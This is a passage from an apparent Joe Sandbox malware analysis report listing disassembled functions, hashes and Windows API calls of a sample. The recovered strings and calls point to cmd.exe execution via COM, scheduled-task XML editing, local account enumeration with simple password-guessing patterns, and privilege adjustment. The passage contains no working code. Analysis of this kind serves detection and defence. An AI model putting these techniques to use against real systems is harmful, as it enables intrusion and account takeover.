                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7917371D01215AFDB50EFA5C840B9EB7B5AF88304F26847EE805B7381D738AD11CBA8
                                                                                                                                                                                                              Function 0043CC10 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
                                                                                                                                                                                                              • Instruction ID: 91c87d25872e839baae7933b1d26ceab25bf760725ff438016367df0c9695c0c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E51B333F215214BE348EA7ACC8415A73D3EBCA31075AC63AD901DB395E974E96396C4
                                                                                                                                                                                                              Function 0040ED30 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 7928e8e2b48241c328333a21e1eda0a8dfd2b13abab1239be22144118d9f0051
                                                                                                                                                                                                              • Instruction ID: f12356c3dda02b0944d66f82227427b0d7e0263a6395cb29892584ed5db79ad8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7928e8e2b48241c328333a21e1eda0a8dfd2b13abab1239be22144118d9f0051
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19517C7190D3918BD311CF2AC48066BBBE1AFD9314F044E6EF8C4A7352D7798A458B96
                                                                                                                                                                                                              Function 0043CA30 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                              • Instruction ID: 448e8c8128ee218613f355b6a59d53b40018dab5e4ac80cca173ede8df55363b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4141C277E51A3947F3188949CD81744AA52ABCC324F2B83B5CD2C6B356D8B9ED039AD0
                                                                                                                                                                                                              Function 0040EF50 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c32c7c64c535abbb448f0f017838c40942559ebacb89743a81205ea225361776
                                                                                                                                                                                                              • Instruction ID: 081832729734f64ca8943200ec232ae7a260b1d72c680c68a8391be1ada1e6fc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c32c7c64c535abbb448f0f017838c40942559ebacb89743a81205ea225361776
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9751D07150D3918BD321CF29C48066BBBE1ABD9314F084A7EF8D497352D778CA49CB92
                                                                                                                                                                                                              Function 0042EB80 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cdf6d4a0cfe518c56610cbc80524ad7fcbb6d49a35438cb6cea347061e269f64
                                                                                                                                                                                                              • Instruction ID: b4677f41d66d6811b44967b30f698def2232b76b1c2307f426304baac9f77722
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdf6d4a0cfe518c56610cbc80524ad7fcbb6d49a35438cb6cea347061e269f64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 472150339744B701E7908B768C8863277E3EFCB245FAF85B5D649C7652E23DE4029124
                                                                                                                                                                                                              Function 004147E0 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                              • Instruction ID: f17dcb8967b96d5ed4dd8b06982efda1dc527591578653ebadaafebabbad66e2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5201C43F174E8D42852D642C1024AFA12405B9275A7D4062BEAD7D83E2EFCED8E7D08F
                                                                                                                                                                                                              Function 00414050 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0a5098dc99a450b7ee807eb59e07f73775cbb25fdf3b48f52af6f44802a00f1a
                                                                                                                                                                                                              • Instruction ID: b1f166e1dc89a3f01e43aa2e4643af66497838ab6b388673c2e8518e001627dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a5098dc99a450b7ee807eb59e07f73775cbb25fdf3b48f52af6f44802a00f1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A301A2B59057189FEB20DF54DD857ABBBB4FB06304F40819DE98D97280C3B51A84CB96
                                                                                                                                                                                                              Function 00406800 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                              • Instruction ID: 7532f4c657dbcf864b1e0f3702b5c669a99d63d3a165ab0069a886a8ac68f27f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AC04C36111850CFC642DB08E144D81B3E4EF05631B0A84C5A4055B621C234ED41CA40
                                                                                                                                                                                                              Function 00403699 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 292memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                              • String ID: 00-->$<Actions $p=<u
                                                                                                                                                                                                              • API String ID: 3028510665-3770785300
                                                                                                                                                                                                              • Opcode ID: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction ID: bc67798b7604906b9ac94ea6a24e9e769d05a344691ee016a8b24aa6f3249a27
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62A1CEB25043119BC720DF64CC49F5B7BA8EFC8751F048A29FA49A7391D774EA04CB99
                                                                                                                                                                                                              Function 00403050 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 436commemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,?,?,7604DB30), ref: 00403060
                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                                • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                                • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                                • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                              • String ID: cmd.exe$p=<u
                                                                                                                                                                                                              • API String ID: 2839743307-310530878
                                                                                                                                                                                                              • Opcode ID: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                              • Instruction ID: bf3241a60ff26ee6c0642b95ea0adfafd6aded52afbf6c2e6df27db904542273
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CF1EC75E102199FCB00DFA8C884A9EBBB9FF88710F15815AE914BB351D774AD41CF94
                                                                                                                                                                                                              Function 00401EA0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 169threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,7604DB30), ref: 00401EC6
                                                                                                                                                                                                              • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,7604DB30), ref: 00401EE2
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                              • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,759A5430,00000000,?), ref: 00401923
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                              • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                              • String ID: %s1$%s12$%s123
                                                                                                                                                                                                              • API String ID: 1588441251-2882894844
                                                                                                                                                                                                              • Opcode ID: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction ID: f170fe93e02ccaf968bc2c6ae71e56240b4678089189b5983d08b015d4f9d182
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 735184B25143016BD331EB54C984FEB73E8ABD8754F404A2EF6846B1D0DB78DA44CBA6
                                                                                                                                                                                                              Function 004028D0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 34COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028D9
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                              • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                              • String ID: Pnv$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3001685711-2958163460
                                                                                                                                                                                                              • Opcode ID: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction ID: 2c3c2cb6c74497f887580688acf30243e480456bbc90e7420e586ff1c8abd763
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF012B07542196AEA1067A1AE0AB5B3A5CDB84790F404177BF04F61D0DAB99C0185FD
                                                                                                                                                                                                              Function 00402FF0 Relevance: 13.5, APIs: 9, Instructions: 39memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,753CE610,00402FDE), ref: 0040300F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,753CE610,00402FDE), ref: 0040302B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2629017576-0
                                                                                                                                                                                                              • Opcode ID: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction ID: 103af2a08650daedf0ea572f36775c75d91e7ca6a6ced768a9e875140008d5cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F05EB56012117BEA206BB66D8CF572A6CEF88B82F084025B709F2180CA74CE109678
                                                                                                                                                                                                              Function 004015A0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004015C4
